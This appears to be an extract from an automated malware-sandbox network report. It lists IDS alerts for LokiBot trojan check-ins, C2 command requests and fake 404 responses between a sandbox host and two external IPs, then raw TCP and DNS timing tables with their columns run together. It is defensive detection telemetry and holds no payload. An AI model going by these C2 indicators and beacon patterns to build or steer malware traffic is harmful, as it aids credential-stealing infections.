                  192.168.2.3188.114.97.349805802021641 08/11/22-06:43:09.287221TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349817802024313 08/11/22-06:43:11.901228TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349828802825766 08/11/22-06:43:14.503252TCP2825766ETPRO TROJAN LokiBot Checkin M24982880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349817802024318 08/11/22-06:43:11.901228TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349794802825766 08/11/22-06:43:01.964847TCP2825766ETPRO TROJAN LokiBot Checkin M24979480192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349885802024313 08/11/22-06:43:55.376397TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988580192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349751802025381 08/11/22-06:42:22.964431TCP2025381ET TROJAN LokiBot Checkin4975180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349753802021641 08/11/22-06:42:25.207102TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349823802021641 08/11/22-06:43:13.321407TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982380192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349879802021641 08/11/22-06:43:48.403290TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987980192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349785802825766 08/11/22-06:42:51.879415TCP2825766ETPRO TROJAN LokiBot Checkin M24978580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349883802825766 08/11/22-06:43:53.308240TCP2825766ETPRO TROJAN LokiBot Checkin M24988380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349750802024313 08/11/22-06:42:21.832277TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349788802025381 08/11/22-06:42:54.331478TCP2025381ET TROJAN LokiBot Checkin4978880192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349896802024313 08/11/22-06:44:07.789189TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349748802825766 08/11/22-06:42:19.613257TCP2825766ETPRO TROJAN LokiBot Checkin M24974880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349750802024318 08/11/22-06:42:21.832277TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349748802025381 08/11/22-06:42:19.613257TCP2025381ET TROJAN LokiBot Checkin4974880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349751802825766 08/11/22-06:42:22.964431TCP2825766ETPRO TROJAN LokiBot Checkin M24975180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349793802025381 08/11/22-06:43:00.645450TCP2025381ET TROJAN LokiBot Checkin4979380192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349756802021641 08/11/22-06:42:28.447484TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975680192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349746802024313 08/11/22-06:42:17.452589TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349882802025381 08/11/22-06:43:51.663595TCP2025381ET TROJAN LokiBot Checkin4988280192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349791802025381 08/11/22-06:42:58.117986TCP2025381ET TROJAN LokiBot Checkin4979180192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349840802825766 08/11/22-06:43:28.505356TCP2825766ETPRO TROJAN LokiBot Checkin M24984080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349766802825766 08/11/22-06:42:42.773950TCP2825766ETPRO TROJAN LokiBot Checkin M24976680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349795802825766 08/11/22-06:43:03.020333TCP2825766ETPRO TROJAN LokiBot Checkin M24979580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349896802024318 08/11/22-06:44:07.789189TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349766802024318 08/11/22-06:42:42.773950TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349828802025381 08/11/22-06:43:14.503252TCP2025381ET TROJAN LokiBot Checkin4982880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349747802024318 08/11/22-06:42:18.537201TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974780192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349764802024318 08/11/22-06:42:41.209817TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976480192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349898802025381 08/11/22-06:44:09.907279TCP2025381ET TROJAN LokiBot Checkin4989880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349795802021641 08/11/22-06:43:03.020333TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349774802025381 08/11/22-06:42:44.099150TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349747802024313 08/11/22-06:42:18.537201TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349840802025381 08/11/22-06:43:28.505356TCP2025381ET TROJAN LokiBot Checkin4984080192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349752802021641 08/11/22-06:42:24.044623TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349788802825766 08/11/22-06:42:54.331478TCP2825766ETPRO TROJAN LokiBot Checkin M24978880192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349892802024318 08/11/22-06:44:04.916628TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349750802825766 08/11/22-06:42:21.832277TCP2825766ETPRO TROJAN LokiBot Checkin M24975080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349797802024318 08/11/22-06:43:05.379365TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979780192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349749802024318 08/11/22-06:42:20.745320TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974980192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349881802025381 08/11/22-06:43:50.015660TCP2025381ET TROJAN LokiBot Checkin4988180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349883802024318 08/11/22-06:43:53.308240TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349794802024313 08/11/22-06:43:01.964847TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979480192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349875802025381 08/11/22-06:43:47.334573TCP2025381ET TROJAN LokiBot Checkin4987580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349892802024313 08/11/22-06:44:04.916628TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989280192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349755802024313 08/11/22-06:42:27.395952TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349838802025381 08/11/22-06:43:24.421881TCP2025381ET TROJAN LokiBot Checkin4983880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349786802025381 08/11/22-06:42:53.219319TCP2025381ET TROJAN LokiBot Checkin4978680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349794802024318 08/11/22-06:43:01.964847TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979480192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349764802024313 08/11/22-06:42:41.209817TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976480192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349749802024313 08/11/22-06:42:20.745320TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349757802021641 08/11/22-06:42:29.610436TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349785802021641 08/11/22-06:42:51.879415TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349883802024313 08/11/22-06:43:53.308240TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349766802021641 08/11/22-06:42:42.773950TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349867802024313 08/11/22-06:43:45.824252TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349805802825766 08/11/22-06:43:09.287221TCP2825766ETPRO TROJAN LokiBot Checkin M24980580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349850802025381 08/11/22-06:43:33.879385TCP2025381ET TROJAN LokiBot Checkin4985080192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349777802024318 08/11/22-06:42:45.276948TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977780192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349853802025381 08/11/22-06:43:40.660156TCP2025381ET TROJAN LokiBot Checkin4985380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349782802021641 08/11/22-06:42:50.570997TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349811802825766 08/11/22-06:43:10.662100TCP2825766ETPRO TROJAN LokiBot Checkin M24981180192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349744802025381 08/11/22-06:42:15.052087TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349761802025381 08/11/22-06:42:34.002289TCP2025381ET TROJAN LokiBot Checkin4976180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349778802024313 08/11/22-06:42:46.945645TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349763802825766 08/11/22-06:42:39.324991TCP2825766ETPRO TROJAN LokiBot Checkin M24976380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349852802825766 08/11/22-06:43:38.361573TCP2825766ETPRO TROJAN LokiBot Checkin M24985280192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349777802024313 08/11/22-06:42:45.276948TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977780192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349758802025381 08/11/22-06:42:30.656105TCP2025381ET TROJAN LokiBot Checkin4975880192.168.2.3188.114.97.3
                  188.114.97.3192.168.2.380497982025483 08/11/22-06:43:06.684563TCP2025483ET TROJAN LokiBot Fake 404 Response8049798188.114.97.3192.168.2.3
                  192.168.2.3188.114.97.349757802825766 08/11/22-06:42:29.610436TCP2825766ETPRO TROJAN LokiBot Checkin M24975780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349798802825766 08/11/22-06:43:06.576803TCP2825766ETPRO TROJAN LokiBot Checkin M24979880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349859802825766 08/11/22-06:43:42.759258TCP2825766ETPRO TROJAN LokiBot Checkin M24985980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349823802024318 08/11/22-06:43:13.321407TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349763802021641 08/11/22-06:42:39.324991TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349742802025381 08/11/22-06:42:12.661275TCP2025381ET TROJAN LokiBot Checkin4974280192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349885802024318 08/11/22-06:43:55.376397TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988580192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349852802021641 08/11/22-06:43:38.361573TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985280192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349755802024318 08/11/22-06:42:27.395952TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975580192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349797802024313 08/11/22-06:43:05.379365TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979780192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349887802025381 08/11/22-06:43:58.405291TCP2025381ET TROJAN LokiBot Checkin4988780192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349830802825766 08/11/22-06:43:16.837786TCP2825766ETPRO TROJAN LokiBot Checkin M24983080192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349756802825766 08/11/22-06:42:28.447484TCP2825766ETPRO TROJAN LokiBot Checkin M24975680192.168.2.3188.114.96.3
                  TimestampSource PortDest PortSource IPDest IP
                  Aug 11, 2022 06:42:12.641289949 CEST4974280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:12.658476114 CEST8049742188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:12.658581972 CEST4974280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:12.661274910 CEST4974280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:12.678405046 CEST8049742188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:12.678615093 CEST4974280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:12.695673943 CEST8049742188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:12.770203114 CEST8049742188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:12.770303965 CEST8049742188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:12.770360947 CEST4974280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:12.773736954 CEST4974280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:12.787421942 CEST8049742188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:14.025392056 CEST4974380192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:14.042526960 CEST8049743188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:14.042761087 CEST4974380192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:14.045455933 CEST4974380192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:14.062542915 CEST8049743188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:14.062895060 CEST4974380192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:14.080081940 CEST8049743188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:14.156966925 CEST8049743188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:14.157006025 CEST8049743188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:14.157121897 CEST4974380192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:14.157250881 CEST4974380192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:14.174371004 CEST8049743188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:15.032388926 CEST4974480192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:15.049277067 CEST8049744188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:15.049468040 CEST4974480192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:15.052087069 CEST4974480192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:15.068974972 CEST8049744188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:15.069155931 CEST4974480192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:15.086220026 CEST8049744188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:15.165085077 CEST8049744188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:15.165282965 CEST4974480192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:15.182149887 CEST8049744188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:15.385853052 CEST8049744188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:15.386019945 CEST4974480192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:16.141204119 CEST4974580192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:16.158157110 CEST8049745188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:16.158272028 CEST4974580192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:16.160936117 CEST4974580192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:16.177822113 CEST8049745188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:16.177916050 CEST4974580192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:16.194792032 CEST8049745188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:16.296185017 CEST8049745188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:16.296262026 CEST8049745188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:16.296331882 CEST4974580192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:16.296387911 CEST4974580192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:16.313214064 CEST8049745188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:17.432554007 CEST4974680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:17.449594975 CEST8049746188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:17.449698925 CEST4974680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:17.452589035 CEST4974680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:17.469443083 CEST8049746188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:17.469538927 CEST4974680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:17.486363888 CEST8049746188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:17.548320055 CEST8049746188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:17.548495054 CEST4974680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:17.565593004 CEST8049746188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:17.772173882 CEST8049746188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:17.772280931 CEST4974680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:18.517294884 CEST4974780192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:18.534280062 CEST8049747188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:18.534388065 CEST4974780192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:18.537200928 CEST4974780192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:18.554110050 CEST8049747188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:18.554195881 CEST4974780192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:18.571082115 CEST8049747188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:18.641688108 CEST8049747188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:18.641735077 CEST8049747188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:18.641812086 CEST4974780192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:18.658911943 CEST8049747188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:19.570935011 CEST4974880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:19.588134050 CEST8049748188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:19.590482950 CEST4974880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:19.613256931 CEST4974880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:19.630363941 CEST8049748188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:19.630528927 CEST4974880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:19.647604942 CEST8049748188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:19.732111931 CEST8049748188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:19.732347012 CEST4974880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:19.732391119 CEST8049748188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:19.732456923 CEST4974880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:19.749492884 CEST8049748188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:20.722404003 CEST4974980192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:20.739322901 CEST8049749188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:20.739495993 CEST4974980192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:20.745320082 CEST4974980192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:20.762134075 CEST8049749188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:20.762243032 CEST4974980192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:20.779179096 CEST8049749188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:20.839010000 CEST8049749188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:20.839044094 CEST8049749188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:20.839148998 CEST4974980192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:20.839890003 CEST4974980192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:20.856784105 CEST8049749188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:21.812501907 CEST4975080192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:21.829464912 CEST8049750188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:21.829591990 CEST4975080192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:21.832277060 CEST4975080192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:21.849179983 CEST8049750188.114.97.3192.168.2.3
                  TimestampSource PortDest PortSource IPDest IP
                  Aug 11, 2022 06:42:12.579299927 CEST5641753192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:12.602015018 CEST53564178.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:13.992285013 CEST5592353192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:14.014944077 CEST53559238.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:15.008493900 CEST5772353192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:15.031099081 CEST53577238.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:16.117017984 CEST5811653192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:16.137682915 CEST53581168.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:17.405890942 CEST5742153192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:17.425028086 CEST53574218.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:18.496882915 CEST6535853192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:18.516221046 CEST53653588.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:19.546256065 CEST4987353192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:19.568968058 CEST53498738.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:20.700263977 CEST5380253192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:20.720654964 CEST53538028.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:21.791645050 CEST6526653192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:21.811207056 CEST53652668.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:22.919214964 CEST6333253192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:22.941586018 CEST53633328.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:23.995779991 CEST6354853192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:24.015325069 CEST53635488.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:25.168421984 CEST4932753192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:25.185749054 CEST53493278.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:26.266694069 CEST5139153192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:26.285726070 CEST53513918.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:27.336091995 CEST5898153192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:27.355494976 CEST53589818.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:28.398569107 CEST6445253192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:28.415982008 CEST53644528.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:29.567910910 CEST6138053192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:29.587415934 CEST53613808.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:30.599355936 CEST6314653192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:30.618824005 CEST53631468.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:31.643933058 CEST5298553192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:31.661487103 CEST53529858.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:32.866031885 CEST5862553192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:32.883007050 CEST53586258.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:33.939414978 CEST5281053192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:33.958312035 CEST53528108.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:35.888000011 CEST5077853192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:35.905409098 CEST53507788.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:39.275734901 CEST5515153192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:39.295176029 CEST53551518.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:41.147021055 CEST5979553192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:41.166609049 CEST53597958.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:42.621895075 CEST6481653192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:42.748029947 CEST53648168.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:44.058989048 CEST5381653192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:44.078478098 CEST53538168.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:45.236285925 CEST6064053192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:45.256028891 CEST53606408.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:46.902745962 CEST4984453192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:46.922283888 CEST53498448.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:49.092282057 CEST6386153192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:49.111659050 CEST53638618.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:50.516971111 CEST5151853192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:50.536231041 CEST53515188.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:51.834033012 CEST5258153192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:51.851875067 CEST53525818.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:53.157044888 CEST5015253192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:53.176513910 CEST53501528.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:54.271861076 CEST5045053192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:54.291218042 CEST53504508.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:55.372447968 CEST5242753192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:55.389997959 CEST53524278.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:56.596381903 CEST6272453192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:56.616301060 CEST53627248.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:58.058382034 CEST6494153192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:58.078123093 CEST53649418.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:59.355876923 CEST5540353192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:59.373456955 CEST53554038.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:00.603039026 CEST5496053192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:00.622443914 CEST53549608.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:01.898330927 CEST6187753192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:01.917530060 CEST53618778.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:02.955979109 CEST6462453192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:02.975430965 CEST53646248.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:04.122617960 CEST6441253192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:04.141944885 CEST53644128.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:05.296510935 CEST5177953192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:05.314194918 CEST53517798.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:06.496205091 CEST5060853192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:06.515471935 CEST53506088.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:07.973258018 CEST5420553192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:07.990590096 CEST53542058.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:09.210062981 CEST5849753192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:09.229652882 CEST53584978.8.8.8192.168.2.3
